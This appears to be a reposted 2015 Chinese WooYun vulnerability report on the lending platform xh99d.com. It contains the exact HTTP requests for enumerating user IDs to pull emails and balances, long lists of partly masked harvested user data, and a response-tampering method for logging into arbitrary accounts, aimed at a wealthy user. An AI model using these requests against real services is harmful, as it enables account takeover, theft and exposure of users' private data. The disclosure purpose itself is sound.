记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

新华久久贷相当大设计缺陷(影响用户全部用户资金安全)

2015-08-10 18:55

下载app

S50805-152732.jpg



正常的登录发现这样一个接口

code 区域
POST /xh99d_api/mobile/account_manage.json HTTP/1.1

Content-Length: 20

Content-Type: application/x-www-form-urlencoded

Host: www.xh99d.com

Connection: close

User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; MX4) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Accept-Encoding: gzip



catalog=1&userId=238





response如下

code 区域
HTTP/1.1 200 OK

Server: nginx/1.1.19

Date: Wed, 05 Aug 2015 07:17:50 GMT

Content-Type: application/json;charset=UTF-8

Content-Length: 245

Connection: keep-alive

Content-Language: zh-CN



{"code":200,"message":"successful","result":{"allMoney":0.00,"avaiMoney":0.0,"blockMoney":0.0,"incomeMoney":0.00,"payMoney":0.00,"userEmail":"******@163.com","userRealName":""},"resultCode":"200","resultMessage":"Success","success":true}



id遍历即可得到用户资金,邮箱等,我们遍历一下

mask 区域
*****[email protected] *****

*****[email protected] *****

*****198@sohu.*****

*****[email protected] *****

*****uan@sina.*****

*****[email protected] *****

*****07773@qq.*****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****78468@qq.*****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****guo1974@12*****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****jun0507@16*****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****2001@163.*****

*****ang@sina.*****

*****[email protected] *****

*****[email protected] *****

*****@vip.sina.*****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****79336@qq.*****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****87372@qq.*****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****@163.com*****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****51108@qq.*****

*****[email protected] *****

*****[email protected] *****

*****1020@163.*****

*****g-tina@16*****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****47725@qq.*****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****76480@qq.*****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****41283@qq.*****

*****in222@163*****

*****[email protected] *****

*****613@hotmail.*****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****69813@qq.*****

*****[email protected] *****

*****11844@qq.*****

*****87971@qq.*****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****961@163.*****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****[email protected] *****

*****688@qq.com*****

*****2516@qq.c*****

*****123@163.c*****

*****1000@qq.c*****

*****2732@qq.c*****

*****4899@qq.c*****

*****625@qq.com*****

*****60426@yeah.*****

*****@126.com*****

*****0551@126.*****

*****3971@qq.c*****

*****35067@qq.*****

*****1922@qq.c*****

*****9641@qq.c*****

*****502@qq.com*****

*****0051@qq.c*****

*****dj@163.co*****

*****2016@qq.c*****

*****10275@qq.*****

*****2297@qq.c*****

*****2058@qq.c*****

*****3527@qq.c*****

*****n128@163.*****

*****1580@qq.c*****

*****527@qq.co*****

*****8168@qq.c*****

*****9760@qq.c*****

*****989@qq.co*****

*****@126.com*****

*****7718@qq.c*****

*****8719@qq.c*****

*****9314@163.c*****

*****dboy@126.*****

*****97@163.com*****

*****784@qq.co*****

*****26@163.com*****

*****304@qq.co*****

*****3889@qq.c*****

*****gjun@163.c*****

*****476@qq.co*****

*****1381@qq.c*****

*****42598@qq.*****

*****96@qq.com*****

*****6384@qq.c*****

*****88@163.co*****

*****52723@qq.*****

*****7393@qq.c*****

*****1011@qq.c*****

*****369@qq.com*****

*****79382@qq.*****

*****8967@qq.c*****

*****6763@qq.c*****

*****ju@hotmail*****

*****611@163.c*****

*****9492@qq.c*****

*****8790@qq.c*****

*****70794@qq.*****

*****66@sina.c*****

*****44865@qq.*****

*****8237@qq.c*****

*****2720@qq.c*****

*****864@qq.co*****

*****4470@qq.c*****

*****0553@qq.c*****

*****203@qq.co*****

*****860@qq.co*****

*****1946@qq.c*****

*****325@qq.co*****

*****359@qq.com*****

*****9186@qq.c*****

*****2880@qq.c*****

*****1758@qq.c*****

*****959@qq.com*****

*****4367@qq.c*****

*****6528@qq.c*****

*****4864@qq.c*****

*****6588@qq.c*****

*****8092@qq.c*****

*****954@qq.co*****

*****g0419@163.c*****

*****133@qq.com*****

*****1570@qq.c*****

*****98@163.com*****

*****@163.com*****

*****3956@qq.c*****

*****x@126.com*****

*****400@qq.co*****

*****9816@qq.c*****

*****097@qq.com*****

*****67@126.c*****

*****9648@qq.c*****

*****7772@qq.co*****

*****023@qq.co*****

*****403@qq.co*****

*****823@qq.co*****

*****590@qq.co*****

*****0223@qq.c*****

*****g_vip@126.*****

*****9674@qq.c*****

*****7510@qq.c*****

*****2107@qq.c*****

*****543@qq.com*****

*****8603@126.co*****

*****57282@qq.*****

*****1919@qq.c*****

*****7546@qq.c*****

*****964@qq.co*****

*****g2001@126.*****

*****z@163.com*****

*****3195@qq.c*****

*****1726@qq.c*****

*****7759@qq.c*****

*****alv@126.c*****

*****4456@qq.c*****

*****0281@qq.c*****

*****1923@qq.c*****

*****45611@163.c*****

*****ing@126.c*****

*****1643@qq.c*****

*****1618@qq.c*****

*****9401@qq.c*****

*****z@sina.cn*****

*****48106@qq.*****

*****5769@qq.c*****

*****4258@qq.c*****

*****681761@13*****

*****634@qq.co*****

*****24@qq.com*****

*****497@qq.co*****

*****1732@qq.c*****

*****726@163.co*****

*****6769@139.c*****

*****5239@qq.c*****

*****8@163.com*****

*****4@163.com*****

*****7183@qq.c*****

*****4049@qq.c*****

*****888@163.c*****

*****zq@sohu.*****

*****112920@16*****

*****9713@qq.c*****

*****46605@qq.*****

*****hsbank.com*****

*****7110@qq.c*****

*****0909@qq.c*****

*****1431@qq.c*****

*****70135@qq.*****

*****6@126.com*****

*****29@qq.com*****

*****99@qq.com*****

*****4807@qq.c*****

*****90491@qq.*****

*****77718@QQ*****



=================我是Dlove的分割线J========================================

然后这就发现了一堆,之后我就猜会不会有任意用户登录呢??过然后。



2.jpg



用户名和密码随便填写,登陆处抓包!

3.jpg



将response改为

code 区域
HTTP/1.1 200 OK

Server: nginx/1.1.19

Date: Wed, 05 Aug 2015 07:38:01 GMT

Content-Type: application/json;charset=UTF-8

Content-Length: 112

Connection: keep-alive

Content-Language: zh-CN



{"code":200,"message":"successful","result":{"emailValidFlag":1,"isOpenAccount":"0","phoneValidFlag":1,"userDocNo":"","userEmail":"dondsda@163.com","userHeadImg":"","userId":630,"userName":"yxtest","userPhone":"1511111199","userRealName":"","userType":1},"resultCode":"200","resultMessage":"{UŸ","success":true}





只需更改userid即可,其他登陆后会随网络进行更新!

我们选择刚才便利的userid,用个土豪的试试!



S50805-152659.jpg

S50805-154324.jpg

S50805-154417.jpg

S50805-154557.jpg

S50805-154605.jpg

S50805-154728.jpg





可以看到快速体现金额,这样看还是太慢,发现了这样一个接口,可以快速看到用户邮箱,总金额,患有可提现金额!

code 区域
POST /xh99d_api/mobile/account_manage.json HTTP/1.1

Content-Length: 18

Content-Type: application/x-www-form-urlencoded

Host: www.xh99d.com

Connection: close

User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; MX4) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Accept-Encoding: gzip



catalog=1&userId=5



同样遍历userid即可

4.jpg



mask 区域
*****57266.36152*****

*****5316.258865*****

*****104966.6829*****

*****446.03139056*****

*****52578.33761*****

*****47642.75wi*****

*****040.331983*****

*****17217.321193*****

*****40281.11410*****

*****18973.09996*****

*****957.18qianme*****

*****40281.11286*****

*****130.6646509*****

*****113.3441910*****

*****5201.67474*****

*****95397.7262*****

*****8141.89xuli*****

*****4826.172045*****

*****145.9850643*****

*****3158.71shan*****

*****85184.4375*****

*****444126.7345*****

*****0536.667142*****

*****31640.04364*****

*****5201.67924*****

*****6321.92hubi*****

*****30344.06343*****

*****0980.005240*****

*****0980.005638*****

*****3098.00694*****

*****27964.92349*****

*****5201.67676*****

*****8565.353814*****

*****03418.06290*****

*****91013.97l*****

*****437.9078006*****

*****21700.74192*****

*****92395.02wxd*****

*****120.9980583*****

*****030.005760*****

*****423977.30ch*****

*****0.00yuanl*****

*****2016.67zhan*****

*****.00zhangwendy*****

*****16215.05983*****

*****1210.001204*****

*****316.6436341*****

*****105705.38ta*****

*****1210.00haol*****

*****2014.0623*****

*****201405.561*****

*****71121.672*****

*****50.00fyy9*****

*****753.83guofei*****

*****551.1019219*****

*****5484.934046*****

*****201.419421*****

*****158633.37la*****

*****2184.70409*****

*****157670.022*****

*****7176.006570*****

*****201.67fight*****

*****2683.341019*****

*****295703.60*****

*****362777.856*****

*****7163.36satan*****

*****0.00jinhu0*****

*****3284.31gufen*****

*****49775.13158*****

*****383916.68lu*****

*****1648.00834*****

*****588260.1739*****

*****575570.31l*****

*****54617.78747*****

*****526.843700*****

*****416454.45c*****

*****20.0013391*****

*****41613.33251*****

*****1957.863954*****

*****052.04zqf91*****

*****6334.00116*****

*****21331.57348*****

*****121708.3214*****

*****21778.60757*****

*****5393.90yuen*****

*****73670.28447*****

*****813.07liushu*****

*****110.02lm3761*****

*****52685.05543*****

*****58001.68bzl*****

*****595135.35304*****

*****76205.14zs-*****

*****92673.00773*****

*****10070.28590*****

*****10070.28417*****

*****103078.429*****

*****0653.324000*****

*****0653.344594*****

*****6066.666734*****

*****0.00838269*****

*****35999.99yue*****

*****14.9087676*****

*****100.701050*****

*****100.704749*****

*****.85qikedong*****

*****100.702127*****

*****23061.17715*****

*****632.50hfniug*****

*****10326.66115*****

*****156050.0060*****

*****8.10huangyig*****

*****144.3767433*****

*****562.0029043*****

*****104033.331*****

*****10403.33kkl*****

*****8489.434228*****

*****luyan0@hsbank.co*****

*****03.33luyan0@*****

*****04137.361396*****

*****1557.931062*****

*****314.911205*****

*****544933.98wuy*****

*****70.007579*****

*****20977.37121*****

*****1073.345142*****

*****095.99lu229*****

*****31680.00798*****

*****3502037.901*****

*****9.60chenhui*****

*****289.31lacy0*****

*****65371.36ky*****

*****72927.3715*****

*****396546.681*****

*****291.6835398*****

*****620.87281*****

*****50351.3912*****

*****50351.3946*****

*****50351.3916*****

*****5035.145474*****

*****51633.34lx*****

*****165971.236*****

*****181.66xiaobai*****

*****5293.18245*****

*****12.21heting*****

*****4.031385511*****

*****523.246178*****

*****23.2470938*****

*****853.0630635*****

*****018.6551049*****

*****0.00449300*****

*****9886.267181*****

*****0.00329383*****

*****11.1414524*****

*****5.361832668*****

*****957.3835110*****

*****9749.131089*****

*****11.2135779*****

*****468.4317294*****

*****105.42ghtz*****

*****7917.724994*****

*****621.6731278*****

*****8557.513297*****

*****683.3442563*****

*****0.00737726*****

*****941.50lhy20*****

*****0.005988*****

*****4639.081985*****

*****2.01jincong*****

*****965258.29y*****



我们这次目标锁定,直接奔土豪!

5.jpg



就这个1千万的土豪了,登陆试试!



1.jpg



=======================

没有点确定,拒绝查水表!!

=======================

漏洞证明:

修复方案:

你肯定知道


知识来源: www.wooyun.org/bugs/wooyun-2015-0131872

阅读:137409 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“新华久久贷相当大设计缺陷(影响用户全部用户资金安全)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云